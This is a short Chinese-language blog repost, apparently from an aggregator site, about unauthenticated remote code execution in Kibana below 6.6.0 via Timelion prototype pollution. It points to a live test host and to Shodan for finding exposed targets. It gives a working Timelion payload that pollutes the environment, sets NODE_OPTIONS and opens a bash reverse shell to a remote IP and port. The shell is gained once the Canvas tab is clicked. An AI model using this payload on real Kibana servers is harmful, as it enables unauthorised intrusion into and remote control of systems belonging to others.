kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)
Posted ListSec
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)相关的知识,希望对你有一定的参考价值。
测试样例:http://34.197.54.42/app/canvas#/
利用shodan(https://www.shodan.io/search?query=kibana)搜索
poc:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
点击左侧的Canvas之后,就可获取shell。
参考:
https://github.com/jas502n/kibana-RCE
以上是关于kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)的主要内容,如果未能解决你的问题,请参考以下文章
尝试访问 <img /> 中受保护的视频流时未要求授权 - 标签 = 403 [重复]